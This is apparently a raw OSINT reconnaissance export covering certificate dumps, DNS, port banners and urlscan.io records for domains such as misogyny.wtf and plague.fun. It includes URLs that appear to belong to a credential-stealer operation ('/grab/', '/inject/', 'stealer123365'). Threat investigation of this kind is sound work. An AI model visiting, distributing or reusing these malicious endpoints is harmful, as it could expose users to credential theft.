dc:56:6f:34:6e:a2:18:0b:b8:cc:59:6d:20:5b:58: e9:6c:0c:a6:d1:d6:fd:0a:2b:f1:a1:bd:2b:df:eb: 4f:a3 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: D2:5E:32:54:AB:C0:23:7F:D8:B8:85:A9:49:B2:9E:58:78:A0:55:DB X509v3 Authority Key Identifier: keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8 Authority Information Access: OCSP - URI:http://ocsp.pki.goog/s/gts1p5/cwPali_UwUM CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der X509v3 Subject Alternative Name: DNS:*.misogyny.wtf, DNS:misogyny.wtf X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.11129.2.5.3 X509v3 CRL Distribution Points: Full Name: URI:http://crls.pki.goog/gts1p5/PkkZg3aqgvc.crl CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption 57:8b:bf:21:ca:42:95:a1:0d:34:b5:22:26:6f:5f:e2:0f:91: 1f:62:c8:df:fb:6d:23:b7:a5:bf:18:3f:74:fb:25:f4:39:12: 06:e0:16:6e:a3:fa:de:ff:5c:e7:d9:9e:b3:ef:e9:e1:04:e2: 82:07:79:0f:92:d9:4f:78:b2:02:be:a5:07:87:f4:f5:f1:ae: 40:04:dd:38:56:32:60:2a:07:21:8e:0d:ad:a5:c5:ba:ad:a8: ff:50:68:22:d6:63:23:da:4c:27:34:b2:fc:06:07:c5:f2:7f: 4c:58:57:af:76:7a:02:b9:ed:e0:62:8e:6a:b5:97:a0:26:8f: 9f:6f:24:3a:a9:2c:02:35:03:0f:62:3e:db:eb:56:47:2a:de: ab:4a:db:7e:1d:40:17:d1:e1:e5:bd:a3:49:ca:bb:8c:7b:4d: de:a1:83:db:94:ba:35:a6:60:ea:39:8d:e6:4f:a6:9a:1a:a7: 35:cf:b9:40:bc:e5:1b:22:b4:47:71:66:dd:77:72:8b:34:aa: 48:32:67:4b:68:b0:41:19:7b:2c:3c:ce:a5:4d:df:f5:6c:a9: 7b:16:1e:8a:78:47:11:e8:a6:96:12:66:84:5f:ce:cc:51:3a: fc:6e:5c:8c:2b:a4:40:cb:8a:ba:0b:50:b8:cf:4a:0d:c6:18: 48:f4:35:0b 2022-12-18 00:04:36 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:43:e4:fc:51:db:21:42:a6:26:a1:af:57:d7:7c:1f:09:d4 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Mar 8 17:39:27 2022 GMT Not After : Jun 6 17:39:26 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:63:06:0d:b4:4b:4a:57:30:47:e6:68:c4:a0:06: e4:58:1f:c8:0e:38:75:86:1e:73:96:2c:89:c8:ec: 31:ce:7c:ee:7b:5d:74:75:c9:dc:a4:c6:8f:c0:3b: 27:88:0b:98:a2:b9:e4:84:96:c4:e0:e1:7d:26:c6: 1c:f1:97:8d:a0 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 63:2A:32:F5:F5:82:2C:C6:1C:1E:DA:47:97:C6:17:4B:A9:C9:45:6A X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: ecdsa-with-SHA384 30:66:02:31:00:97:56:75:a4:ab:85:b3:50:ed:46:db:3a:1f: bb:75:b0:f2:57:84:4c:bf:f2:9d:c2:5b:2b:9a:9c:e1:50:bc: ca:4c:3a:37:50:3f:91:2b:f1:3d:3b:c7:20:19:52:08:b1:02: 31:00:eb:3f:e4:2f:4c:57:97:77:3f:dd:d6:ab:3b:c1:ef:85: 47:a0:a6:99:62:c9:31:7b:f5:c6:c6:03:dc:f8:80:fc:da:81: 41:e5:0b:5f:ff:ad:15:77:95:f9:67:83:36:5f plague.fun 2022-12-18 00:21:34 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b0ef6cacfce28b-ORD Content-Encoding: gzip 104.21.19.243 2022-12-18 00:03:12 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 04:50:42:ff:9a:7a:0a:ec:db:51:55:79:18:dd:8f:ed:52:b0 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Jan 8 17:50:30 2022 GMT Not After : Apr 8 17:50:29 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:ac:b0:17:a9:7b:51:da:31:7f:8f:00:19:b7:3b: 98:64:90:41:83:01:ae:da:c8:aa:ac:d4:17:62:2b: f9:44:4e:05:5a:c8:20:ef:dc:a2:f3:45:78:3a:ed: af:b0:2e:06:e9:62:bd:f4:43:71:b4:d3:b3:eb:3a: 9b:77:69:ad:57:fc:60:7d:16:9c:b5:f7:25:94:e1: d6:18:0a:b4:34:e5:56:64:cc:e2:54:4f:50:e0:38: 81:9d:d7:46:81:ca:56:b5:53:ad:f7:4c:ec:d0:48: 14:8e:09:3d:e6:af:c3:a5:c9:12:3c:1d:64:d4:9c: c3:59:ad:d4:5a:90:12:14:ee:34:d6:07:da:98:71: 90:50:14:13:80:f5:4a:58:eb:3a:b7:cf:cc:11:3d: 17:0b:fd:11:95:39:4c:00:a7:3e:c8:28:36:88:a4: 5a:c3:63:19:a5:30:8d:fb:f6:75:72:a1:28:62:08: ad:b5:a6:ec:e6:7c:06:10:f1:0e:9d:91:27:6a:1f: 94:91:88:4b:5b:e5:39:a6:d1:08:1c:fe:26:bf:6d: 75:5a:be:c5:92:fe:2c:75:45:5f:45:87:11:0e:32: 54:cc:4c:c8:27:b5:05:6f:bc:c5:7b:a3:f9:a5:6e: eb:b2:1c:a1:62:b9:c5:09:cd:81:eb:42:27:b7:b3: 09:af Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 5A:40:9D:CB:29:61:19:0B:49:48:24:70:A0:AC:F1:60:B9:77:E4:E6 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 29:79:BE:F0:9E:39:39:21:F0:56:73:9F:63:A5:77:E5: BE:57:7D:9C:60:0A:F8:F9:4D:5D:26:5C:25:5D:C7:84 Timestamp : Jan 8 18:50:31.079 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:21:00:8A:ED:1F:02:55:07:04:9B:33:8A:18: 9E:EC:35:86:59:0D:51:53:39:C3:BB:CC:BA:B4:73:87: 9B:09:AF:10:EC:02:20:0C:21:C1:58:B9:D7:D0:11:02: 53:1B:55:34:76:64:E6:F0:77:DB:72:E8:17:F2:55:75: EA:77:35:10:C3:E9:2B Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77: 15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13 Timestamp : Jan 8 18:50:31.428 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:4B:56:BC:EE:D0:F8:1A:2B:3F:80:F9:7E: 97:8D:72:37:04:9C:3B:A1:90:56:11:BD:DA:1A:00:5D: 17:6A:21:7E:02:20:58:96:51:0D:94:2E:16:50:61:E8: 7C:92:97:45:2D:D9:92:71:00:CA:64:D8:4C:49:D5:01: 9B:CC:4E:EA:8D:9D Signature Algorithm: sha256WithRSAEncryption 2c:00:7d:72:58:4f:d1:2f:6c:10:e5:f1:b0:20:f7:03:55:a0: 76:08:e4:be:c1:4d:8c:a9:01:c3:9c:31:29:8b:67:61:92:af: 7f:01:a7:98:77:9d:41:9b:c6:6a:a7:d4:87:b0:c6:2a:6e:b2: 93:a8:59:22:29:14:c8:c4:1c:b8:85:56:bd:a3:04:4a:a6:7c: 5a:3d:fc:76:55:4e:2b:05:58:c7:a6:e2:8c:25:27:c5:b2:a4: 7b:2e:58:c7:6b:bd:23:e1:30:bb:5e:18:f7:82:24:69:da:f7: 95:a3:a6:2a:18:55:00:b9:54:08:f8:d3:d5:35:2f:98:a2:7c: 0d:a4:4b:12:9b:8b:6a:31:87:72:1f:09:83:a3:3a:33:8f:a6: 6b:ce:27:fc:0e:38:13:77:f9:79:f9:ca:d2:f2:0f:36:2b:c8: 23:28:38:4b:eb:8e:db:6e:b9:36:48:d9:d5:08:13:77:19:4d: 06:ca:4f:72:22:42:f3:bd:35:78:01:0f:a6:cd:3a:29:b4:49: fc:8e:2c:32:32:50:12:1e:81:b8:2a:d7:c7:63:63:29:25:9d: df:b3:65:87:1a:15:13:5b:e4:c1:12:a9:c6:3e:65:5a:18:83: 7d:88:88:ec:8d:41:62:f3:f5:77:5e:7c:ab:2e:48:36:b7:b7: 13:e4:41:b3 2022-12-18 00:22:07 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Connection": "DISPLAY_UTF8"}, "Connection": ["close"]} 34.149.204.188 2022-12-18 00:14:56 HTTP Status Code No Web Spider 0 0 2 0 None None https://zerotwo-best-waifu.online/778112985743251/wap/shatlegay/stealer123365 2022-12-18 00:09:49 Co-Hosted Site No HackerTarget 0 0 2 0 None banadislifo.tk 172.67.147.230 2022-12-18 00:03:24 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None 178.204.149.34.bc.googleusercontent.com 34.149.204.178 2022-12-18 00:08:41 Internet Name No DNS Resolver 0 0 2 0 None misogyny.wtf Certificate: Data: Version: 3 (0x2) Serial Number: 04:d6:9e:d2:88:e9:c1:89:74:28:65:2d:6e:88:09:50:9f:4f Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Jul 23 20:47:28 2022 GMT Not After : Oct 21 20:47:27 2022 GMT Subject: CN=*.misogyny.wtf Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:e2:0d:a7:a1:bf:81:84:fe:a2:ff:8d:36:67:3d: 94:76:0b:74:ea:c9:c4:15:da:67:48:de:38:52:f4: 66:f1:cf:58:f5:ed:3b:fb:e6:93:95:6d:62:df:c4: e1:a5:f5:b7:4f:c3:28:52:2d:05:bb:ed:9b:1c:5a: e7:bc:37:9b:b8 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 4E:89:67:D2:CE:A1:37:68:F8:76:14:2C:47:E7:EC:A8:A1:05:92:71 X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.misogyny.wtf, DNS:misogyny.wtf X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 46:A5:55:EB:75:FA:91:20:30:B5:A2:89:69:F4:F3:7D: 11:2C:41:74:BE:FD:49:B8:85:AB:F2:FC:70:FE:6D:47 Timestamp : Jul 23 21:47:28.797 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:20:4A:E4:98:06:90:A2:26:39:BD:A3:6A:4D: A5:7D:F1:92:76:73:72:56:74:3A:35:52:D7:FB:31:D9: 74:05:08:1E:02:21:00:B0:93:6A:A9:62:11:5A:40:39: 2B:5D:8F:F2:B0:49:8D:C2:25:5A:18:EB:A8:30:DD:03: 35:2A:7E:D3:F4:F2:67 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : DF:A5:5E:AB:68:82:4F:1F:6C:AD:EE:B8:5F:4E:3E:5A: EA:CD:A2:12:A4:6A:5E:8E:3B:12:C0:20:44:5C:2A:73 Timestamp : Jul 23 21:47:29.288 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:21:00:82:A5:33:2A:58:8B:8C:1F:9F:4B:6D: 4A:2F:12:2D:E3:FE:A7:28:F4:C0:8C:35:19:EC:8B:9F: F0:53:88:42:EC:02:20:31:C6:4A:90:78:BA:FC:46:8F: 35:C5:3B:CC:8D:A4:F3:45:0A:18:35:06:B6:5C:3F:AF: B0:B5:53:71:1D:FD:1F Signature Algorithm: ecdsa-with-SHA384 30:65:02:30:51:f5:5e:96:72:85:74:e1:c8:1d:1f:3a:76:ec: 30:30:1f:6a:a3:b9:3a:48:71:6e:7a:89:26:a4:97:e8:4f:fa: a6:31:65:eb:9b:94:68:7e:a3:b7:a5:f6:3a:44:2c:10:02:31: 00:b4:9c:3b:57:ea:e2:4a:ff:81:b6:e2:50:9c:33:11:2c:aa: 54:8b:cc:88:19:a0:e7:80:27:26:fa:4c:bc:51:32:0e:23:00: d6:39:a6:58:a5:d6:7a:f2:0b:9e:18:35:75 2022-12-18 00:21:30 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b19748df8a61c8-ORD Content-Encoding: gzip 172.67.190.129 2022-12-18 00:08:45 Internet Name No DNS Resolver 0 0 2 0 None zerotwo-best-waifu.online www.zerotwo-best-waifu.online 2022-12-18 00:10:03 Internet Name - Unresolved No URLScan.io 0 0 1 0 None wasp.plague.fun plague.fun 2022-12-18 00:21:17 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Server: cloudflare Date: Content-Type: text/html Content-Length: 151 Connection: keep-alive CF-RAY: 77b0cd4c299e2d49-ORD 188.114.96.1 2022-12-18 00:22:14 Netblock Membership No Censys 0 0 2 0 None 172.67.160.0/20 172.67.169.215 2022-12-18 00:09:12 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.1:8443 188.114.96.0/24 2022-12-18 00:09:29 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.9:80 188.114.96.0/24 2022-12-18 00:18:29 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.12:8443 188.114.97.0/24 2022-12-18 00:21:58 Software Used Yes Censys 0 0 2 0 None CloudFlare CloudFlare Load Balancer 2a06:98c1:3120::1 2022-12-18 00:25:19 Physical Location No MetaDefender 0 0 2 0 None San Jose, United States 104.21.28.240 2022-12-18 00:10:04 Raw Data from RIRs No URLScan.io 0 0 1 0 None [{u'sort': [1670411037724, u'b8459fd2-83fd-4e66-8ab8-cc2bb30aa35b'], u'task': {u'domain': u'misogyny.wtf', u'uuid': u'b8459fd2-83fd-4e66-8ab8-cc2bb30aa35b', u'url': u'https://misogyny.wtf/inject/UsRjS959Rqm4sPG4', u'visibility': u'public', u'time': u'2022-12-07T11:03:57.724Z', u'apexDomain': u'misogyny.wtf', u'method': u'manual'}, u'stats': {u'uniqIPs': 0, u'uniqCountries': 0, u'requests': 0, u'dataLength': 0}, u'screenshot': u'https://urlscan.io/screenshots/b8459fd2-83fd-4e66-8ab8-cc2bb30aa35b.png', u'result': u'https://urlscan.io/api/v1/result/b8459fd2-83fd-4e66-8ab8-cc2bb30aa35b/', u'_id': u'b8459fd2-83fd-4e66-8ab8-cc2bb30aa35b', u'page': {u'url': u'https://misogyny.wtf/inject/UsRjS959Rqm4sPG4', u'domain': u'misogyny.wtf'}}, {u'sort': [1670410880241, u'f08f98fb-5092-4d00-be93-204263cf5847'], u'task': {u'domain': u'misogyny.wtf', u'uuid': u'f08f98fb-5092-4d00-be93-204263cf5847', u'url': u'https://misogyny.wtf/', u'visibility': u'public', u'time': u'2022-12-07T11:01:20.241Z', u'apexDomain': u'misogyny.wtf', u'method': u'manual'}, u'stats': {u'uniqIPs': 0, u'uniqCountries': 0, u'requests': 0, u'dataLength': 0}, u'screenshot': u'https://urlscan.io/screenshots/f08f98fb-5092-4d00-be93-204263cf5847.png', u'result': u'https://urlscan.io/api/v1/result/f08f98fb-5092-4d00-be93-204263cf5847/', u'_id': u'f08f98fb-5092-4d00-be93-204263cf5847', u'page': {u'url': u'https://misogyny.wtf/', u'domain': u'misogyny.wtf'}}, {u'sort': [1670344471737, u'f83c1f25-0fe2-4b77-81e1-0c361dbbb86a'], u'task': {u'domain': u'misogyny.wtf', u'uuid': u'f83c1f25-0fe2-4b77-81e1-0c361dbbb86a', u'tags': [u'falconsandbox'], u'url': u'http://misogyny.wtf:2020/parser', u'visibility': u'public', u'time': u'2022-12-06T16:34:31.737Z', u'apexDomain': u'misogyny.wtf', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 4674, u'requests': 3, u'dataLength': 3630}, u'screenshot': u'https://urlscan.io/screenshots/f83c1f25-0fe2-4b77-81e1-0c361dbbb86a.png', u'result': u'https://urlscan.io/api/v1/result/f83c1f25-0fe2-4b77-81e1-0c361dbbb86a/', u'_id': u'f83c1f25-0fe2-4b77-81e1-0c361dbbb86a', u'page': {u'mimeType': u'text/html', u'status': u'200', u'domain': u'misogyny.wtf', u'title': u'Wasp Parser', u'url': u'http://misogyny.wtf:2020/parser', u'country': u'BR', u'asnname': u'MICROSOFT-CORP-MSN-AS-BLOCK, US', u'ip': u'20.226.83.185', u'apexDomain': u'misogyny.wtf', u'asn': u'AS8075'}}, {u'sort': [1670344429390, u'0731eef5-aedd-4fbe-8876-ebb15af24bc6'], u'task': {u'domain': u'misogyny.wtf', u'uuid': u'0731eef5-aedd-4fbe-8876-ebb15af24bc6', u'tags': [u'falconsandbox'], u'url': u'http://misogyny.wtf:8080/', u'visibility': u'public', u'time': u'2022-12-06T16:33:49.390Z', u'apexDomain': u'misogyny.wtf', u'method': u'api'}, u'stats': {u'uniqIPs': 0, u'uniqCountries': 0, u'requests': 0, u'dataLength': 0}, u'screenshot': u'https://urlscan.io/screenshots/0731eef5-aedd-4fbe-8876-ebb15af24bc6.png', u'result': u'https://urlscan.io/api/v1/result/0731eef5-aedd-4fbe-8876-ebb15af24bc6/', u'_id': u'0731eef5-aedd-4fbe-8876-ebb15af24bc6', u'page': {u'url': u'http://misogyny.wtf:8080/', u'domain': u'misogyny.wtf'}}, {u'sort': [1670340399738, u'19665abc-7aa0-4a45-a797-773dbc687d87'], u'task': {u'domain': u'misogyny.wtf', u'uuid': u'19665abc-7aa0-4a45-a797-773dbc687d87', u'tags': [u'falconsandbox'], u'url': u'http://misogyny.wtf/grab/UsRjS959Rqm4sPG4', u'visibility': u'public', u'time': u'2022-12-06T15:26:39.738Z', u'apexDomain': u'misogyny.wtf', u'method': u'api'}, u'stats': {u'uniqIPs': 0, u'uniqCountries': 0, u'requests': 0, u'dataLength': 0}, u'screenshot': u'https://urlscan.io/screenshots/19665abc-7aa0-4a45-a797-773dbc687d87.png', u'result': u'https://urlscan.io/api/v1/result/19665abc-7aa0-4a45-a797-773dbc687d87/', u'_id': u'19665abc-7aa0-4a45-a797-773dbc687d87', u'page': {u'url': u'http://misogyny.wtf/grab/UsRjS959Rqm4sPG4', u'domain': u'misogyny.wtf'}}, {u'sort': [1670340343120, u'993eade3-d2c0-4407-8929-c4c5d32013e4'], u'task': {u'domain': u'misogyny.wtf', u'uuid': u'993eade3-d2c0-4407-8929-c4c5d32013e4', u'tags': [u'falconsandbox'], u'url': u'http://misogyny.wtf/inject/UsRjS959Rqm4sPG4', u'visibility': u'public', u'time': u'2022-12-06T15:25:43.120Z', u'apexDomain': u'misogyny.wtf', u'method': u'api'}, u'stats': {u'uniqIPs': 0, u'uniqCountries': 0, u'requests': 0, u'dataLength': 0}, u'screenshot': u'https://urlscan.io/screenshots/993eade3-d2c0-4407-8929-c4c5d32013e4.png', u'result': u'https://urlscan.io/api/v1/result/993eade3-d2c0-4407-8929-c4c5d32013e4/', u'_id': u'993eade3-d2c0-4407-8929-c4c5d32013e4', u'page': {u'url': u'http://misogyny.wtf/inject/UsRjS959Rqm4sPG4', u'domain': u'misogyny.wtf'}}, {u'sort': [1670266722965, u'cec606b8-c7e8-440e-b5c1-e54bfeecfdfe'], u'task': {u'domain': u'misogyny.wtf', u'uuid': u'cec606b8-c7e8-440e-b5c1-e54bfeecfdfe', u'url': u'http://misogyny.wtf/inject/UsRjS959Rqm4sPG4', u'visibility': u'public', u'time': u'2022-12-05T18:58:42.965Z', u'apexDomain': u'misogyny.wtf', u'method': u'manual'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 12195, u'requests': 1, u'dataLength': 12019}, u'screenshot': u'https://urlscan.io/screenshots/cec606b8-c7e8-440e-b5c1-e54bfeecfdfe.png', u'result': u'https://urlscan.io/api/v1/result/cec606b8-c7e8-440e-b5c1-e54bfeecfdfe/', u'_id': u'cec606b8-c7e8-440e-b5c1-e54bfeecfdfe', u'page': {u'mimeType': u'text/html', u'status': u'200', u'domain': u'misogyny.wtf', u'url': u'http://misogyny.wtf/inject/UsRjS959Rqm4sPG4', u'ip': u'20.226.83.185', u'asnname': u'MICROSOFT-CORP-MSN-AS-BLOCK, US', u'server': u'Werkzeug/2.2.2 Python/3.9.11', u'country': u'BR', u'apexDomain': u'misogyny.wtf', u'asn': u'AS8075'}}, {u'sort': [1669730312603, u'cf6b010e-dcf1-45ea-8d1c-72a1761a13f0'], u'task': {u'domain': u'misogyny.wtf', u'uuid': u'cf6b010e-dcf1-45ea-8d1c-72a1761a13f0', u'url': u'http://misogyny.wtf/inject/UsRjS959Rqm4sPG4', u'visibility': u'public', u'time': u'2022-11-29T13:58:32.603Z', u'apexDomain': u'misogyny.wtf', u'method': u'manual'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 12552, u'requests': 1, u'dataLength': 12376}, u'screenshot': u'https://urlscan.io/screenshots/cf6b010e-dcf1-45ea-8d1c-72a1761a13f0.png', u'result': u'https://urlscan.io/api/v1/result/cf6b010e-dcf1-45ea-8d1c-72a1761a13f0/', u'_id': u'cf6b010e-dcf1-45ea-8d1c-72a1761a13f0', u'page': {u'mimeType': u'text/html', u'status': u'200', u'domain': u'misogyny.wtf', u'url': u'http://misogyny.wtf/inject/UsRjS959Rqm4sPG4', u'ip': u'20.226.83.185', u'asnname': u'MICROSOFT-CORP-MSN-AS-BLOCK, US', u'server': u'Werkzeug/2.2.2 Python/3.9.11', u'country': u'BR', u'apexDomain': u'misogyny.wtf', u'asn': u'AS8075'}}, {u'sort': [1669730249607, u'2071d543-c15b-4ebd-975e-8f2a94226f23'], u'task': {u'domain': u'misogyny.wtf', u'uuid': u'2071d543-c15b-4ebd-975e-8f2a94226f23', u'url': u'http://misogyny.wtf/grab/UsRjS959Rqm4sPG4', u'visibility': u'public', u'time': u'2022-11-29T13:57:29.607Z', u'apexDomain': u'misogyny.wtf', u'method': u'manual'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 32034, u'requests': 1, u'dataLength': 31858}, u'screenshot': u'https://urlscan.io/screenshots/2071d543-c15b-4ebd-975e-8f2a94226f23.png', u'result': u'https://urlscan.io/api/v1/result/2071d543-c15b-4ebd-975e-8f2a94226f23/', u'_id': u'2071d543-c15b-4ebd-975e-8f2a94226f23', u'page': {u'mimeType': u'text/html', u'status': u'200', u'domain': u'misogyny.wtf', u'url': u'http://misogyny.wtf/grab/UsRjS959Rqm4sPG4', u'ip': u'20.226.83.185', u'asnname': u'MICROSOFT-CORP-MSN-AS-BLOCK, US', u'server': u'Werkzeug/2.2.2 Python/3.9.11', u'country': u'BR', u'apexDomain': u'misogyny.wtf', u'asn': u'AS8075'}}, {u'sort': [1669730057154, u'81c71b8b-5519-4298-b6c9-9aa5fe59adbd'], u'task': {u'domain': u'misogyny.wtf', u'uuid': u'81c71b8b-5519-4298-b6c9-9aa5fe59adbd', u'url': u'http://misogyny.wtf/grab/UsRjS959Rqm4sPG4', u'visibility': u'public', u'time': u'2022-11-29T13:54:17.154Z', u'apexDomain': u'misogyny.wtf', u'method': u'manual'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 32240, u'requests': 1, u'dataLength': 32064}, u'screenshot': u'https://urlscan.io/screenshots/81c71b8b-5519-4298-b6c9-9aa5fe59adbd.png', u'result': u'https://urlscan.io/api/v1/result/81c71b8b-5519-4298-b6c9-9aa5fe59adbd/', u'_id': u'81c71b8b-5519-4298-b6c9-9aa5fe59adbd', u'page': {u'mimeType': u'text/html', u'status': u'200', u'domain': u'misogyny.wtf', u'url': u'http://misogyny.wtf/grab/UsRjS959Rqm4sPG4', u'ip': u'20.226.83.185', u'asnname': u'MICROSOFT-CORP-MSN-AS-BLOCK, US', u'server': u'Werkzeug/2.2.2 Python/3.9.11', u'country': u'BR', u'apexDomain': u'misogyny.wtf', u'asn': u'AS8075'}}, {u'sort': [1669729857745, u'f790fc7c-b381-40d2-bf28-46b8634c5620'], u'task': {u'domain': u'misogyny.wtf', u'uuid': u'f790fc7c-b381-40d2-bf28-46b8634c5620', u'url': u'http://misogyny.wtf/inject/UsRjS959Rqm4sPG4', u'visibility': u'public', u'time': u'2022-11-29T13:50:57.745Z', u'apexDomain': u'misogyny.wtf', u'method': u'manual'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 12208, u'requests': 1, u'dataLength': 12032}, u'screenshot': u'https://urlscan.io/screenshots/f790fc7c-b381-40d2-bf28-46b8634c5620.png', u'result': u'https://urlscan.io/api/v1/result/f790fc7c-b381-40d2-bf28-46b8634c5620/', u'_id': u'f790fc7c-b381-40d2-bf28-46b8634c5620', u'page': {u'mimeType': u'text/html', u'status': u'200', u'domain': u'misogyny.wtf', u'url': u'http://misogyny.wtf/inject/UsRjS959Rqm4sPG4', u'ip': u'20.226.83.185', u'asnname': u'MICROSOFT-CORP-MSN-AS-BLOCK, US', u'server': u'Werkzeug/2.2.2 Python/3.9.11', u'country': u'BR', u'apexDomain': u'misogyny.wtf', u'asn': u'AS8075'}}, {u'sort': [1669729657614, u'fa9ea82e-f800-45b7-b2db-7c53c9974795'], u'task': {u'domain': u'misogyny.wtf', u'uuid': u'fa9ea82e-f800-45b7-b2db-7c53c9974795', u'url': u'http://misogyny.wtf/grab/UsRjS959Rqm4sPG4', u'visibility': u'public', u'time': u'2022-11-29T13:47:37.614Z', u'apexDomain': u'misogyny.wtf', u'method': u'manual'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 32855, u'requests': 1, u'dataLength': 32679}, u'screenshot': u'https://urlscan.io/screenshots/fa9ea82e-f800-45b7-b2db-7c53c9974795.png', u'result': u'https://urlscan.io/api/v1/result/fa9ea82 misogyny.wtf 2022-12-18 00:23:00 Co-Hosted Site No SSL Certificate Analyzer 0 0 3 0 None amen.fr 81.88.48.102 2022-12-18 00:09:19 Physical Location No LeakIX 0 0 2 0 None United States 172.67.137.37 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None spottedelectroniclibrary.0300fllas.repl.co 34.149.204.188 2022-12-18 00:09:54 Hosting Provider No Hosting Provider Identifier 0 0 2 0 None Cloudflare Inc: https://www.cloudflare.com/ 104.21.28.240 2022-12-18 00:03:07 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 34.149.204.189 34.149.204.188 2022-12-18 00:06:15 Web Content No Web Spider 1 0 1 0 None https://discord.gg/uD2nwtBvbP misogyny.wtf 2022-12-18 00:21:17 Open TCP Port Banner No Censys 0 0 2 0 